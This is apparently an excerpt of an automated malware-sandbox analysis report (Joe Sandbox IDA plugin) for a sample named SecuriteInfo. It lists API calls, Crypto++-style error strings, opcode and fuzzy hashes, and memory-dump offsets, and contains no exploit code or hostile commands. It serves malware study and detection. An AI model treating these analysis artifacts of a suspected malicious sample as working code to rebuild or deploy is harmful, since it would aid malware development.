                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ErrorHandling__87except__start
                                            • String ID: pow
                                            • API String ID: 2905807303-2276729525
                                            • Opcode ID: 871a331679999f07660258749dfedf6e3763d9568c62ba2022bb871265e16d81
                                            • Instruction ID: 7869ba77b686de690443b655297e3911615cb003b00973334a020e19fa99c776
                                            • Opcode Fuzzy Hash: 871a331679999f07660258749dfedf6e3763d9568c62ba2022bb871265e16d81
                                            • Instruction Fuzzy Hash: 03515B71F1D20196C702AB15C96139A7BB4DB42B1CF30CE58E4F442FA8FB35C496AB46
                                            APIs
                                            • __cftoe.LIBCMT ref: 6CEA88ED
                                              • Part of subcall function 6CEFA116: __mbstowcs_s_l.LIBCMT ref: 6CEFA12C
                                            • __cftoe.LIBCMT ref: 6CEA8911
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: __cftoe$__mbstowcs_s_l
                                            • String ID: zX$P
                                            • API String ID: 1494777130-2079734279
                                            • Opcode ID: 600da2dc39a02c11ed3cb09d9df8cc4869f7546379b5080897c49b82e007d081
                                            • Instruction ID: fb1e68ab20017d269ea6c93623cba0c13c2092fa6f4d03053c0ec0ee3f0a67db
                                            • Opcode Fuzzy Hash: 600da2dc39a02c11ed3cb09d9df8cc4869f7546379b5080897c49b82e007d081
                                            • Instruction Fuzzy Hash: 479100B11087819FC376CF148880BEBBBF8BB84714F604A1DE19D4B280DB715645CF92
                                            APIs
                                            • __CxxThrowException@8.LIBCMT ref: 6CEC8ABB
                                            • __CxxThrowException@8.LIBCMT ref: 6CEC8B82
                                            Strings
                                            • PK_DefaultDecryptionFilter: ciphertext too long, xrefs: 6CEC8A8E
                                            • : invalid ciphertext, xrefs: 6CEC8B48
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw
                                            • String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long
                                            • API String ID: 2005118841-483996327
                                            • Opcode ID: c60539e14770c5a6d3cd3ef17b8b3f97f42316f9a7f44b11d6353362b0dd523d
                                            • Instruction ID: 3f9310e67da7a8e1b81ac8b7e09ea7e92ad8e1c56e6749163d5e9bd4090c9650
                                            • Opcode Fuzzy Hash: c60539e14770c5a6d3cd3ef17b8b3f97f42316f9a7f44b11d6353362b0dd523d
                                            • Instruction Fuzzy Hash: A3512DB52047409FD324CF54C990EABB7F8EF99708F108A1DE59A97B50DB31E909CB62
                                            APIs
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A
                                            • __CxxThrowException@8.LIBCMT ref: 6CEC6BA6
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE94067
                                              • Part of subcall function 6CE94010: _memmove.LIBCMT ref: 6CE940C8
                                            • __CxxThrowException@8.LIBCMT ref: 6CEC6C56
                                            Strings
                                            • NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes, xrefs: 6CEC6B33
                                            • RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 6CEC6BE3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                            • String ID: NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes$RandomNumberGenerator: IncorporateEntropy not implemented
                                            • API String ID: 1902190269-184618050
                                            • Opcode ID: cacae5fb65bfa9f9c589f96f1afa23f22b211b4bf5ffa42cc7324cec47925f6d
                                            • Instruction ID: fad172b99cb8c640bac3b05e2185ff3d17a44b5569fe42ff82d2ff9f279bff65
                                            • Opcode Fuzzy Hash: cacae5fb65bfa9f9c589f96f1afa23f22b211b4bf5ffa42cc7324cec47925f6d
                                            • Instruction Fuzzy Hash: F65118B161C380AFC310DF69C880A5BBBF8BB99758F504A1EF4A587B90D775D908CB52
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CE94EFC
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CE94F16
                                            • _memmove.LIBCMT ref: 6CE94F6C
                                              • Part of subcall function 6CE94D90: std::_Xinvalid_argument.LIBCPMT ref: 6CE94DA9
                                              • Part of subcall function 6CE94D90: std::_Xinvalid_argument.LIBCPMT ref: 6CE94DCA
                                              • Part of subcall function 6CE94D90: std::_Xinvalid_argument.LIBCPMT ref: 6CE94DE5
                                              • Part of subcall function 6CE94D90: _memmove.LIBCMT ref: 6CE94E4D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_$_memmove
                                            • String ID: string too long
                                            • API String ID: 2168136238-2556327735
                                            • Opcode ID: 28ab9481f51ece2f53513ce88e493a94977f30620f51a21dea07b053f6281ba5
                                            • Instruction ID: 03fc5178ff1b94c5bf7394d2d1f7f76c678ac5d06a668c4c90bc1483eddd3d70
                                            • Opcode Fuzzy Hash: 28ab9481f51ece2f53513ce88e493a94977f30620f51a21dea07b053f6281ba5
                                            • Instruction Fuzzy Hash: F631F5323106105BD7259E5CE89096AF7FAEFD1724730892FE4768BF80C731984583A1
                                            APIs
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A
                                            • __CxxThrowException@8.LIBCMT ref: 6CE9211F
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE94067
                                              • Part of subcall function 6CE94010: _memmove.LIBCMT ref: 6CE940C8
                                            • __CxxThrowException@8.LIBCMT ref: 6CE921BF
                                            Strings
                                            • PK_MessageAccumulator: TruncatedFinal() should not be called, xrefs: 6CE9215D
                                            • PK_MessageAccumulator: DigestSize() should not be called, xrefs: 6CE920BD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                            • String ID: PK_MessageAccumulator: DigestSize() should not be called$PK_MessageAccumulator: TruncatedFinal() should not be called
                                            • API String ID: 1902190269-1268710280
                                            • Opcode ID: f96a1ec2c9597d9fd9c7efb8e358966cbe0213a1d46ef035ade0ae52e4064913
                                            • Instruction ID: 8fd4e77756da215865a304ec1f5560cf80f54103bf337c6bfd038049e9622008
                                            • Opcode Fuzzy Hash: f96a1ec2c9597d9fd9c7efb8e358966cbe0213a1d46ef035ade0ae52e4064913
                                            • Instruction Fuzzy Hash: 364130B0C0428CAFDB11DFD9D890BDDFBB8AB19314F50465EE421A7B90DB745608CB50
                                            APIs
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A
                                            • __CxxThrowException@8.LIBCMT ref: 6CE91DC9
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE94067
                                              • Part of subcall function 6CE94010: _memmove.LIBCMT ref: 6CE940C8
                                            • __CxxThrowException@8.LIBCMT ref: 6CE91E74
                                            Strings
                                            • CryptoMaterial: this object contains invalid values, xrefs: 6CE91E16
                                            • BufferedTransformation: this object is not attachable, xrefs: 6CE91D67
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                            • String ID: BufferedTransformation: this object is not attachable$CryptoMaterial: this object contains invalid values
                                            • API String ID: 1902190269-3853263434
                                            • Opcode ID: 9c5687a28977adc4caeb739e043d170fba3659d4d02a1070a514151c87e1fef7
                                            • Instruction ID: f71c34d6d95e5fcffca8d78285ed9fe7f37c47c0ae5e753e923af0b003ad9f5f
                                            • Opcode Fuzzy Hash: 9c5687a28977adc4caeb739e043d170fba3659d4d02a1070a514151c87e1fef7
                                            • Instruction Fuzzy Hash: F7412EB1C04288AFCB15DFE9D890BDDFBB8EB19314F10865EE42567B90DB355A08CB50
                                            APIs
                                              • Part of subcall function 6CEED820: _memmove.LIBCMT ref: 6CEED930
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A
                                            • __CxxThrowException@8.LIBCMT ref: 6CEC761A
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
                                            • String ID: byte digest to $ bytes$HashTransformation: can't truncate a
                                            • API String ID: 39012651-1139078987
                                            • Opcode ID: 1313641461df772cca8b3939f25ed916a0d260753f221796dc4d8050abb8cb14
                                            • Instruction ID: 0b23b748645566e733e94215ded2364d22c724ad2fc4863114d0f08c9e65fe04
                                            • Opcode Fuzzy Hash: 1313641461df772cca8b3939f25ed916a0d260753f221796dc4d8050abb8cb14
                                            • Instruction Fuzzy Hash: 08414E7110C3C0ABD330CB54C845FDBBBE8ABD9718F104A1EE59997B80EB7595088BA7
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CECBF2D
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
                                              • Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                            • String ID: gfff$gfff$vector<T> too long
                                            • API String ID: 1823113695-3369487235
                                            • Opcode ID: 1df9644865a5f09d83804182d30d291701bafb4aa213ff802c732c81255d51f5
                                            • Instruction ID: f1f151aa08615d41d879e265c01c855317ab75a8bf31f3fcfa7f59fb2647cc1e
                                            • Opcode Fuzzy Hash: 1df9644865a5f09d83804182d30d291701bafb4aa213ff802c732c81255d51f5
                                            • Instruction Fuzzy Hash: 5431C8B1A046499FC718CF59DD80E6AF7B9FB48304F14862DE9699B780D731B904CB91
                                            APIs
                                            • QueryPerformanceFrequency.KERNEL32(67D4BDE6,67D4BDE6), ref: 6CEF8E7F
                                            • GetLastError.KERNEL32(0000000A), ref: 6CEF8E8F
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A
                                            • __CxxThrowException@8.LIBCMT ref: 6CEF8F14
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                            Strings
                                            • Timer: QueryPerformanceFrequency failed with error , xrefs: 6CEF8EA5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ErrorExceptionException@8FrequencyLastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
                                            • String ID: Timer: QueryPerformanceFrequency failed with error
                                            • API String ID: 2175244869-348333943
                                            • Opcode ID: 3d72feb9989a6e01a849d959e202837a434e1db1958e9deb15941dcf4202caf5
                                            • Instruction ID: 2089329366c0e3ee457ce2be6058622c6ef4c10450ad10e9c57d1f1a76cdd4f8
                                            • Opcode Fuzzy Hash: 3d72feb9989a6e01a849d959e202837a434e1db1958e9deb15941dcf4202caf5
                                            • Instruction Fuzzy Hash: B2211DB150C380AFD310CF24C841B9BBBF8BB89658F504A1EF5A986741D77595088BA3
                                            APIs
                                            • QueryPerformanceCounter.KERNEL32(67D4BDE6,67D4BDE6,?,00000000), ref: 6CEF8F7F
                                            • GetLastError.KERNEL32(0000000A,?,00000000), ref: 6CEF8F8F
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A
                                            • __CxxThrowException@8.LIBCMT ref: 6CEF9014
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                            Strings
                                            • Timer: QueryPerformanceCounter failed with error , xrefs: 6CEF8FA5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CounterErrorExceptionException@8LastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
                                            • String ID: Timer: QueryPerformanceCounter failed with error
                                            • API String ID: 1823523280-4075696077
                                            • Opcode ID: 7baa797cdf9e75a80129f3801fb5b56eaf2893005c08910f0bec07e2c1eb7510
                                            • Instruction ID: 89e76c629914e1cdbd1570923ae5214dec5ae6c91a98a16f66ea3994e11dca38
                                            • Opcode Fuzzy Hash: 7baa797cdf9e75a80129f3801fb5b56eaf2893005c08910f0bec07e2c1eb7510
                                            • Instruction Fuzzy Hash: AB211DB150C380AFD310CF24C881B9BBBF8BB89658F504A1EF5A986781D77595088BA3
                                            APIs
                                            • __CxxThrowException@8.LIBCMT ref: 6CEC6518
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                            • __CxxThrowException@8.LIBCMT ref: 6CEC6558
                                            Strings
                                            • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 6CEC64E7
                                            • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 6CEC6527
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw$ExceptionRaise
                                            • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                                            • API String ID: 3476068407-3345525433
                                            • Opcode ID: 45b7673affa84556a4e790325471c40e9f2b5ea1c30ae1f278c3aa6f6cf6da6a
                                            • Instruction ID: f1ae63128e156636ad4f5ee42a3d01d10c8eb6012dcd7b3e3a8312bc9010b5e9
                                            • Opcode Fuzzy Hash: 45b7673affa84556a4e790325471c40e9f2b5ea1c30ae1f278c3aa6f6cf6da6a
                                            • Instruction Fuzzy Hash: 4821C3716183809EDB24CF64C940BEBB3F8BB4960CF704E1DE5A982B40EB3594098A63
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CECC14E
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
                                              • Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
